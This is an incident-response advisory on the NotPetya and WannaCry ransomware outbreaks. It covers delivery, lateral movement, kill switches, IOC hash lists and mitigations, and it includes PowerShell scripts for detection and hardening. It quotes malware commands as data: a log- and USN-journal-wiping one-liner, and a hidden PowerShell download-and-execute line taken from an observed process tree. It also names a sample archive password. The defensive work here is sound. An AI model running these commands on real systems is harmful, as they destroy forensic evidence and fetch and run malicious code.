Need information for WannaCry?

Summary - 5-Jul-2017

Talos published a post describing the complete timeline of the NotPetya campaign, starting from infection at MeDoc to delivery : The MeDoc Connection.

Summary - 4-Jul-2017

Kaspersky published an article claiming that around the same time as the delivery of NotPetya another malware, also ransomware, was delivered via the update servers of MeDoc : In ExPetr/Petya’s shadow, FakeCry ransomware wave hits Ukraine. The ransomware contains a number of false flags to make it look like WannaCry.

Summary - 3-Jul-2017

There is little hope for those who paid the ransom in the hope of unlocking their encrypted disks and recovering scrambled files. Researchers from Kaspersky Lab have discovered an error in the malware's code that prevents recovery of the data. The ransomware part of NotPetya was a lure for the media, whereas the real objective was the wiping of systems.

For those who would like to disable the remote execution of PsExec, please refer to the blog article : Petya: disabling remote execution of psexec.

Summary - 30-Jun-2017

A number of security companies are investigating attribution, or linking this campaign to previous malware campaigns.

Summary - 29-Jun-2017

So far no infection method via email has been found. This also means that the phishing delivery method is wrong and that CVE-2017-0199 did not play a role. The IPs listed in the IOC list are also not related to NotPetya. It does no harm to monitor these IPs for other ransomware waves (Loki?), but it will not protect you against NotPetya.

The update request for MeDoc queries a MeDoc update domain. If you are unsure whether your organization uses MeDoc, you can use your proxy server logs to track connections to it.
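As an added example (not code from the original page), the check below finds internal clients that contacted the MeDoc update server in squid-style proxy logs. The page does not name the domain, so $MedocDomain is a placeholder you must replace with the real one; the log lines at the bottom are constructed, not real traffic.

```powershell
# Added example: which internal clients talked to the MeDoc update server?
# $MedocDomain is a placeholder (assumption), replace it with the actual update domain.
$MedocDomain = 'medoc-update.example'

function Find-MedocClients {
    param(
        [Parameter(Mandatory)][string[]] $LogLines,
        [string] $Domain = $MedocDomain
    )
    # Squid native access.log layout: time elapsed client code/status bytes method url ...
    $pattern = '^(?<ts>\d+(\.\d+)?)\s+\d+\s+(?<client>\S+)\s+\S+\s+\d+\s+(?<method>\S+)\s+(?<url>\S+)'
    $epoch   = New-Object DateTime 1970, 1, 1, 0, 0, 0, ([DateTimeKind]::Utc)
    $hits = foreach ($line in $LogLines) {
        if (-not ($line -match $pattern)) { continue }
        $url = $Matches['url']
        # Host part of the URL; CONNECT lines carry host:port instead of a full URL
        $urlHost = ($url -replace '^[a-z]+://', '') -replace '[/:].*$', ''
        if ($urlHost -ieq $Domain -or $urlHost -ilike "*.$Domain") {
            [pscustomobject]@{
                Client = $Matches['client']
                Seen   = $epoch.AddSeconds([double]$Matches['ts'])
                Method = $Matches['method']
                Url    = $url
            }
        }
    }
    # One row per client: number of requests and first/last contact (UTC)
    $hits | Group-Object Client | ForEach-Object {
        [pscustomobject]@{
            Client    = $_.Name
            Requests  = $_.Count
            FirstSeen = ($_.Group | Sort-Object Seen | Select-Object -First 1).Seen
            LastSeen  = ($_.Group | Sort-Object Seen | Select-Object -Last 1).Seen
        }
    }
}

# Constructed sample lines (not real traffic); in practice: Get-Content access.log
$sample = @(
    '1498550400.123    120 10.0.5.21 TCP_MISS/200 1532 GET http://medoc-update.example/update/list.xml - HIER_DIRECT/198.51.100.7 text/xml',
    '1498550460.456     80 10.0.5.21 TCP_MISS/200 904311 GET http://medoc-update.example/update/patch.exe - HIER_DIRECT/198.51.100.7 application/octet-stream',
    '1498550470.001     15 10.0.7.99 TCP_MISS/200 5120 GET http://www.example.org/ - HIER_DIRECT/203.0.113.5 text/html',
    '1498550500.777     40 10.0.9.14 TCP_TUNNEL/200 2048 CONNECT medoc-update.example:443 - HIER_DIRECT/198.51.100.7 -'
)
Find-MedocClients -LogLines $sample | Format-Table -AutoSize
```

With the sample above, 10.0.5.21 and 10.0.9.14 are reported and 10.0.7.99 is not; the same function works on a full access.log read with Get-Content.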

As extra mitigation actions, next to those listed below :

Also read the excellent analysis by Cisco Talos

Summary - 28-Jun-2017

Information that is currently known about the NotPetya ransomware attack.

How did it all start?

There are two main delivery methods known :

Note that the initial spreading did not take place via exploits from the Shadow Brokers leak of NSA tools. Unlike WannaCry, spreading takes place on the internal network, once the attackers already have a foothold in the network of the victim.

Kaspersky reported that NotPetya was also delivered via a watering hole attack, spreading through a drive-by download. The sources of this attack have since been cleaned.

Once inside a network, what happens next?

The malware has a set of capabilities allowing it to work its way through the network of a victim. See for all the details :

Once it infects a host, the further behaviour depends on the privilege level of the malware process and on the processes found running on the machine. Depending on the processes it finds, it will skip infecting the MBR or skip network spreading via SMB.

If it does start encrypting the MBR, it will also schedule a reboot via a scheduled task (at a random time between 10 and 60 minutes after infection).

Regardless of the privileges, it will always attempt to encrypt files on all fixed disks. It does not encrypt files in C:\Windows. No file extension is added to encrypted files: the files are overwritten in place.

Note that by using the WMIC/PsExec/LSA credential dumping techniques, the malware can infect fully patched PCs on the local network, including Windows 10.

Event logs and the USN journal are also deleted (%c is replaced by the drive letter) : wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
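As an added example (not code from the original page), the detection below flags the log-wiping step. Test-LogWipeCommand works on any recorded command line (Security event 4688 with command-line auditing enabled, Sysmon event 1, EDR telemetry); Find-LogWipeEvents queries the local logs, and also pulls the "log cleared" events (Security 1102, System 104) that Windows writes right after a log is cleared and which therefore survive the wipe. The command lines at the bottom are constructed samples.

```powershell
# Added example: detect "wevtutil cl <log>" / "fsutil usn deletejournal" command lines
function Test-LogWipeCommand {
    param([Parameter(Mandatory)][string] $CommandLine)
    $patterns = @(
        '(?i)\bwevtutil(\.exe)?\b.*\b(cl|clear-log)\s+(setup|system|security|application)\b',
        '(?i)\bfsutil(\.exe)?\b.*\busn\s+deletejournal\b'
    )
    foreach ($p in $patterns) {
        if ($CommandLine -match $p) { return $true }
    }
    return $false
}

function Find-LogWipeEvents {
    param([int] $Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # Process creation events: match on the recorded command line
    $creation = @(
        @{ LogName = 'Security'; Id = 4688; StartTime = $since },
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = $since }
    )
    foreach ($f in $creation) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Where-Object { Test-LogWipeCommand -CommandLine $_.Message } |
            Select-Object TimeCreated, LogName, Id, Message
    }
    # The clearing itself is recorded: Security 1102 / System 104 are written after the
    # clear, so they survive it. Forward them to a central collector.
    $cleared = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System';   Id = 104;  StartTime = $since }
    )
    foreach ($f in $cleared) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, LogName, Id, Message
    }
}

# Constructed command lines (not real telemetry): only the first one is flagged
$sampleCommandLines = @(
    'cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:',
    'wevtutil.exe qe Security /c:5 /f:text',
    'fsutil usn queryjournal C:'
)
$sampleCommandLines | ForEach-Object {
    [pscustomobject]@{ Suspicious = (Test-LogWipeCommand -CommandLine $_); CommandLine = $_ }
}
```

Run Find-LogWipeEvents from an elevated prompt (the Security log is not readable otherwise). Because the malware clears the Security log, the 4688 events will usually be gone on the infected host itself; this is why the page advises central logging.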

The ETERNALBLUE code is a cleaned-up version compared to the sample used by WannaCry. This indicates some thought has been given to running this campaign.


There is a kill switch, but unlike WannaCry, where it required a working network connection to a domain, this kill switch has to be applied locally. Creating a file C:\Windows\perfc should prevent the encryption. Do note that the kill switch does not prevent network spreading; it only prevents a machine from getting encrypted. Placing perfc will only protect against current versions: NotPetya checks for a file with the same name (without extension) as the file it was started from. If this gets changed to abcdef.dll, the new variant will check for "C:\Windows\abcdef".
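As an added example (not code from the original page), the script below creates the local kill-switch file and verifies it. The base name defaults to perfc as in the text; pass the base name of a renamed sample (for instance abcdef for abcdef.dll) to cover a variant. The perfc.dat and perfc.dll companions are an assumption (commonly recommended, not stated on this page). It only stops encryption on this host and does nothing against spreading via SMB, PsExec or WMIC.

```powershell
# Added example: create read-only kill-switch files in %WINDIR% and report the result.
# Does NOT stop network spreading; it only prevents this host from being encrypted.
function Install-PerfcVaccine {
    param(
        [string[]] $BaseNames  = @('perfc'),   # base name of the sample (perfc for perfc.dat/.dll)
        [string]   $WindowsDir = $env:WINDIR
    )
    $results = @()
    foreach ($base in $BaseNames) {
        # The extension-less name is the one the text describes; .dat/.dll are an assumption
        foreach ($name in @($base, "$base.dat", "$base.dll")) {
            $path = Join-Path $WindowsDir $name
            if (-not (Test-Path -LiteralPath $path)) {
                New-Item -ItemType File -Path $path | Out-Null
            }
            # Read-only so the file is not casually deleted or replaced
            Set-ItemProperty -LiteralPath $path -Name IsReadOnly -Value $true
            $item = Get-Item -LiteralPath $path
            $results += [pscustomobject]@{
                Path     = $path
                Exists   = [bool]$item
                ReadOnly = $item.IsReadOnly
            }
        }
    }
    return $results
}

# Run from an elevated prompt (C:\Windows is not writable otherwise).
# For a variant started as abcdef.dll: Install-PerfcVaccine -BaseNames 'perfc', 'abcdef'
Install-PerfcVaccine | Format-Table -AutoSize
```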

Is it really ransomware? Or a wiper?

The malware itself is well written and jumps through a couple of hoops to bypass AV detection (making use of a fake Microsoft signature and an XOR-encrypted shellcode payload). On the other hand, the payment chain (which is, from an attacker's point of view, the 'return on investment' part) is very bad. A number of reports came out that this worm is not meant to "monetize" but rather to cause as much damage as possible, see Pnyetya: Yet Another Ransomware Outbreak.

Summary - 27-Jun-2017

The ransomware is delivered via "normal" Office documents, by the modified ETERNALBLUE exploit or by an attack against the update mechanism of MeDoc.

The ransomware captures credentials for spreading, using tools similar to Mimikatz. Credentials are extracted from the lsass.exe process. These credentials are then passed on to PsExec or WMIC for further spreading.

The malware waits 10-60 minutes after infection to reboot the system. Once rebooted, it starts to encrypt the MFT (master file table) of the NTFS partitions.

It spreads by enumerating all known server names via NetBIOS and also retrieves a list of DHCP leases. Each IP that has port 445 or 139 open is attacked.

What is the Petya ransomware?

The Petya ransomware, also known as Petwrap, works very differently from other ransomware. Unlike traditional ransomware, Petya does not encrypt files on a targeted system one by one. Instead, Petya reboots the victim's computer, encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing the information about file names, sizes and location on the physical disk.

The current wave of Petya uses worm-like behaviour by exploiting ETERNALBLUE (also see the WannaCry advice) and CVE-2017-0199.

Note that according to Kaspersky this variant is not related to known versions of Petya, hence the name NotPetya.

No Internet worm

The spreading of the worm seems to be limited to the local network.

According to Fox-IT this is because it looks at the DHCP leases. This is confirmed by Kaspersky : the malware enumerates all network adapters, all known server names via NetBIOS and also retrieves the list of current DHCP leases, if available. Each and every IP on the local network and each server found is checked for open TCP ports 445 and 139. Those machines that have these ports open are then attacked.
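As an added example (not code from the original page), the function below spots what the enumeration described above looks like from a flow log: one source that starts connecting to many internal hosts on tcp/445 or tcp/139 within a short window. It takes any objects with ts, src, dst and dport fields (for example ConvertFrom-Csv over an exported firewall or Zeek conn log); the flows at the bottom are constructed.

```powershell
# Added example: detect SMB/NetBIOS fan-out from a single source in a sliding time window
function Find-SmbFanOut {
    param(
        [Parameter(Mandatory)][object[]] $Flows,
        [int] $Threshold = 10,      # distinct targets within one window that raise an alert
        [int] $WindowMinutes = 5
    )
    $smb  = $Flows | Where-Object { @(445, 139) -contains [int]$_.dport }
    $hits = @()
    foreach ($group in ($smb | Group-Object -Property src)) {
        $events = @($group.Group | Sort-Object { [datetime]$_.ts })
        $best = 0
        # For each start event, count distinct destinations until the window closes
        for ($i = 0; $i -lt $events.Count; $i++) {
            $end = ([datetime]$events[$i].ts).AddMinutes($WindowMinutes)
            $targets = @()
            for ($j = $i; $j -lt $events.Count -and [datetime]$events[$j].ts -le $end; $j++) {
                $targets += $events[$j].dst
            }
            $distinct = @($targets | Select-Object -Unique).Count
            if ($distinct -gt $best) { $best = $distinct }
        }
        if ($best -ge $Threshold) {
            $hits += [pscustomobject]@{
                Source          = $group.Name
                DistinctTargets = $best
                WindowMinutes   = $WindowMinutes
            }
        }
    }
    return $hits
}

# Constructed sample (not real data): 10.0.1.15 sweeps twelve neighbours within a minute,
# 10.0.1.40 is a normal client talking to two file servers.
$rows = @('ts,src,dst,dport')
1..12 | ForEach-Object {
    $rows += ('2017-06-27T10:00:{0:D2},10.0.1.15,10.0.1.{1},445' -f ($_ * 4), (100 + $_))
}
$rows += '2017-06-27T10:05:00,10.0.1.40,10.0.1.5,445'
$rows += '2017-06-27T10:06:00,10.0.1.40,10.0.1.6,139'
$flows = $rows | ConvertFrom-Csv
Find-SmbFanOut -Flows $flows -Threshold 10 | Format-Table -AutoSize
```

Only 10.0.1.15 is reported for the sample. Tune the threshold to your environment: backup servers, vulnerability scanners and SCCM distribution points legitimately fan out on 445 and need an allow-list.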

The local spreading means that there is another initial infection vector. According to Rapid7 this happened via the "normal" ransomware infection, a weaponized document opened by a user. See further in the IOC list (.doc, .xls).


Rumours are that the Petya ransomware is also taking advantage of the WMIC and PsExec tools to infect fully patched Windows computers. You are advised to disable WMIC (or restrict it to IT admin networks only). It dumps passwords and then uses PsExec and WMIC to move laterally.

Also see

According to Securelist, spreading can only happen from an infected system on the network that possesses administrative credentials.

I applied MS17-010. I'm safe! - CVE-2017-0199

Some posts report that the ransomware is also using a client-side vulnerability (CVE-2017-0199). Microsoft released a patch for it in April 2017.

For CVE-2017-0199 : Exploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.

Infection via CVE-2017-0199 is unconfirmed. It might be that one of the hosts sharing a sample was already infected with Loki.

Bitcoin address

Petya makes use of a Bitcoin address. You can monitor the number of payments to it with a blockchain explorer. Do not pay the ransom!


A number of posts report on a kill switch (UNCONFIRMED)

Placing a file c:\windows\myguy or c:\windows\perfc


Indicators of compromise

These IOCs have been made available via several sources.

*********** Possible IP addresses:

*********** Email:
[email protected]

*********** Malware dropped file:

*********** Hashes by codexgigas team:

For, we have:


As droppers

And for


*********** Targeted extensions by @GasGeverij

*********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
- - - - - - - - - - - - - - - - - - - - - - -  - 

File Name                 Order-20062017.doc (RTF with CVE-2017-0199)
MD5 Hash Identifier       415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier     101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier   FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size                 6215 bytes
File Type                 Rich Text Format data

Connects to the host:     port 80


File Name                 myguy.xls
MD5 Hash Identifier       0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier     736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier   EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size                 13893 bytes
File Type                 Zip archive data

Process tree:
    mshta.exe "%WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" (PID: 2324)
    powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://', '%APPDATA%\10807.exe'); (PID: 2588)
        10807.exe "%APPDATA%\10807.exe" (PID: 3096)

File Name                 BCA9D6.exe
MD5 Hash Identifier       A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier     9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier   17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size                 275968 bytes

!!!! Unproven
Connects to the host:     port 80

Pay attention: the trojan for which I give the markers could potentially be used to load the encryption part.

*********** IOC by Informzachita (MISP CSV export; columns: category,type,value,comment,to_ids,date)

Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","",1,20170627
Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
Network activity,url,"","",1,20170627
Network activity,url,"","",1,20170627
Network activity,ip-dst|port,"|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"[email protected]","",1,20170627
Network activity,url,"","",1,20170627
Network activity,ip-dst|port,"|80","",1,20170627
Network activity,domain,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Network activity,ip-dst,"","",1,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
External analysis,comment,"attack-vector:phishing","",0,20170627
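As an added example (not code from the original page), the script below loads the MISP CSV export above into a hash lookup and sweeps a directory tree with Get-FileHash. Only rows with to_ids=1 are used (to_ids=0 rows are context, not detection), and composite types such as filename|sha1 are split. The CSV in the script is a constructed subset of the rows on this page; point -Csv at the full export in practice.

```powershell
# Added example: MISP CSV -> hash lookup -> file system sweep
$iocCsv = @'
category,type,value,comment,to_ids,date
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
'@

function Import-MispHashes {
    param([Parameter(Mandatory)][string] $Csv)
    $lookup = @{}
    foreach ($row in ($Csv | ConvertFrom-Csv)) {
        if ($row.to_ids -ne '1') { continue }        # honour the to_ids flag
        $type  = $row.type
        $value = $row.value
        # Composite types such as filename|sha1 carry "name|hash"
        if ($type -like 'filename|*') {
            $type  = $type.Split('|')[1]
            $value = $value.Split('|')[1]
        }
        if (@('md5', 'sha1', 'sha256') -contains $type) {
            $lookup[$value.ToLower()] = "$($row.category) / $($row.comment)"
        }
    }
    return $lookup
}

function Find-IocMatches {
    param(
        [Parameter(Mandatory)][hashtable] $Lookup,
        [Parameter(Mandatory)][string] $Path
    )
    # Only compute the algorithms we have indicators for (hex length 32/40/64)
    $algorithms = $Lookup.Keys | ForEach-Object {
        switch ($_.Length) { 32 { 'MD5' } 40 { 'SHA1' } 64 { 'SHA256' } }
    } | Select-Object -Unique
    $found = @()
    foreach ($file in (Get-ChildItem -LiteralPath $Path -File -Recurse -ErrorAction SilentlyContinue)) {
        foreach ($algo in $algorithms) {
            $hash = (Get-FileHash -LiteralPath $file.FullName -Algorithm $algo -ErrorAction SilentlyContinue).Hash
            if ($hash -and $Lookup.ContainsKey($hash.ToLower())) {
                $found += [pscustomobject]@{
                    File      = $file.FullName
                    Algorithm = $algo
                    Hash      = $hash.ToLower()
                    Context   = $Lookup[$hash.ToLower()]
                }
            }
        }
    }
    return $found
}

$lookup = Import-MispHashes -Csv $iocCsv
"$($lookup.Count) hash indicators loaded"      # 3: the to_ids=0 md5 and the filename row are skipped
Find-IocMatches -Lookup $lookup -Path $env:APPDATA | Format-Table -AutoSize
```

The sweep path is only an example; the dropped-file rows above (%APPDATA%\10807.exe, C:\myguy.xls.hta) suggest %APPDATA% and the root of C: as a starting point.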


Samples are at
Archive password: virus


WannaCry Updates

9-Jun-2017 : SambaCry is coming

Articles from Kaspersky and Cyphort on a crypto-miner targeting Linux hosts running vulnerable Samba servers. Patch Samba (4.6.4/4.5.10/4.4.14). Use your logs to observe exploitation attempts (write attempts for a file whose name consists of 8 random characters).

23-May-2017 : According to Costin Raiu, WannaCry itself did not support Windows XP

Individual machines could be infected - researchers and testers who put WannaCry on Windows XP systems likely ran it manually - but the worm-like attack code would not spread from an XP PC

22-May-2017 : WannaCry: Ransomware attacks show strong links to Lazarus group

According to Symantec :

Note : IOCs were added to MISP; get them through the OSINT feed in MISP.

OTX has another set of IOCs.

19-May-2017 : Updated Incident Response section - Decryption

Decryption possible for Windows XP to 7, including Windows 2003

19-May-2017 : WannaCry Exploit Now Being Used to Spread Spy Trojan

According to Cyphort, the vulnerability exploited by WannaCry (ETERNALBLUE) is now also being used to spread a trojan.

17-May-2017 : Adylkuzz mining malware

Proofpoint published information on a cryptocurrency mining malware also making use of ETERNALBLUE/DOUBLEPULSAR. This malware predates WannaCry (possibly as early as 24 April).

16-May-2017 : OH LORDY! Comey Wanna Cry Edition

Shadow Brokers issued a statement. ETERNALBLUE was part of the exploit leading to WannaCry.

16-May-2017 : Jaff Ransomware is not WannaCry

Some researchers confuse the Jaff ransomware with WannaCry. Jaff is a more "traditional" style ransomware, explained in detail by Talos. It is not the same as WannaCry.

16-May-2017 : Added Attribution section

16-May-2017 : Update mutex creation : TearSt0pper

15-May-2017 : Uiwix, WannaCry strain

Uiwix has begun to spread by exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used.

15-May-2017 : Another variant

Detected by VirusTotal b9318a66fa7f50f2f3ecaca02a96268ad2c63db7554ea3acbde43bf517328d06

15-May-2017 : Updated SMBv1 section

15-May-2017 : Updated anti-virus section

15-May-2017 : NMAP NSE script to detect vulnerable servers

14-May-2017 : Two new new variants

Two new variants were found. See

Kill switches

Do not rely on these kill switches as the single line of defense. The behaviour of the malware can easily be changed so that these kill switches are no longer relevant! Also, WannaCry is not proxy aware. If you are in a proxied environment they will not help unless you set up an RPZ.




The patch has been out since March 2017. Your patch management process should apply patches rated critical in a timely manner. See

Microsoft also provided mitigation measures for unsupported systems.

Windows 10 and Windows Server 2016 are protected in their default configuration.

Why "Just Patch It!" Isn't as Easy as You Think

An article on the Trend Micro blog explains why "Just Patch It!" isn't as easy as you think.

Disable SMBv1

Disable SMBv1. This is described in the Microsoft document "How to enable and disable SMBv1, SMBv2, and SMBv3 in Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012".

For example on Windows 8 you can do this in PowerShell

Blocking legacy protocols is always recommended!

UPDATE : According to "WannaCry FAQ: What you need to know today" : The vulnerability exploited by the EternalBlue tool lies in the SMBv1 implementation. However, to exploit it, the tool also uses SMBv2. This means that it uses both SMBv1 and SMBv2 packets during the attack. Disabling SMBv1 or SMBv2 prevents the infection ... but disabling SMBv2 can cause problems.

Filter tcp/139 (NetBIOS), tcp/445 (SMB) and tcp/3389 (RDP)

All systems exposed to the Internet should filter NetBIOS, SMB and RDP.

Do not assume that a corporate firewall is enough. Systems connecting through a VPN might be exposed to the Internet before the VPN is started. Also do not forget dual-homed systems. One infected system brought onto the network later is enough.

Internal network filtering

Use local host firewalling on all your systems. Not every system needs to have SMB and RDP available on the network!

Apply network segmentation.
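As an added example (not code from the original page) for the "Disable SMBv1", "Filter tcp/139, tcp/445 and tcp/3389" and "Internal network filtering" steps above, the script below turns off SMBv1 on a Windows 8 / Server 2012 or later workstation, restricts inbound SMB/NetBIOS/RDP to an admin subnet, and verifies the result. The admin subnet in $AllowedRemote is an assumption; adjust it. SMBv2 is left enabled, as the page warns that disabling it causes problems.

```powershell
# Added example: SMBv1 off, inbound 139/445/3389 limited to one subnet, then verify.
# Run from an elevated prompt.
function Disable-Smb1 {
    # Server side: stop offering SMB1 (no reboot needed for this setting)
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Client side: drop the SMB1 redirector (mrxsmb10) from the workstation service
    # dependencies and disable it; takes effect after a reboot
    sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi | Out-Null
    sc.exe config mrxsmb10 start= disabled | Out-Null
    # On Windows 8.1 / Server 2012 R2 and later the whole feature can be removed instead:
    #   Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
}

function Limit-LateralPorts {
    param([string[]] $AllowedRemote = @('10.0.0.0/24'))   # assumed admin / file-server subnet
    # Windows Firewall evaluates Block rules before Allow rules, so a blanket Block on
    # 139/445/3389 would also cut off the admin subnet. Instead: keep the default inbound
    # action on Block, disable the built-in allow groups, and add one narrowly scoped Allow.
    Set-NetFirewallProfile -All -DefaultInboundAction Block
    Get-NetFirewallRule -DisplayGroup 'File and Printer Sharing' -ErrorAction SilentlyContinue | Disable-NetFirewallRule
    Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue | Disable-NetFirewallRule
    $rule = @{
        DisplayName   = 'SMB/NetBIOS/RDP from admin subnet only'
        Direction     = 'Inbound'
        Protocol      = 'TCP'
        LocalPort     = @(139, 445, 3389)
        RemoteAddress = $AllowedRemote
        Action        = 'Allow'
        Profile       = 'Any'
    }
    New-NetFirewallRule @rule | Out-Null
}

function Test-SmbHardening {
    $driver      = Get-CimInstance Win32_SystemDriver -Filter "Name='mrxsmb10'"
    $clientStart = if ($driver) { $driver.StartMode } else { 'not present' }
    [pscustomobject]@{
        Smb1ServerEnabled = (Get-SmbServerConfiguration).EnableSMB1Protocol   # expect False
        Smb1ClientStart   = $clientStart                                        # expect Disabled
        DefaultInbound    = (Get-NetFirewallProfile | Select-Object -ExpandProperty DefaultInboundAction -Unique) -join ','
        AdminAllowRule    = [bool](Get-NetFirewallRule -DisplayName 'SMB/NetBIOS/RDP from admin subnet only' -ErrorAction SilentlyContinue)
    }
}

Disable-Smb1
Limit-LateralPorts -AllowedRemote @('10.0.0.0/24')
Test-SmbHardening
```

On a file server you would keep SMB open to clients and only apply the SMBv1 part; on workstations the Allow rule can usually be dropped altogether, since nothing needs to reach them on 445 or 3389 except management hosts.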

If you run CIFS (the legacy dialect of SMB, i.e. SMBv1) you are also targeted.

So far, RDP looks to be used as an initial attack vector via brute force (guessing weak credentials). Once access is gained via RDP, WannaCry is deployed and can spread automatically.

Disconnect your backups and test your restore procedures

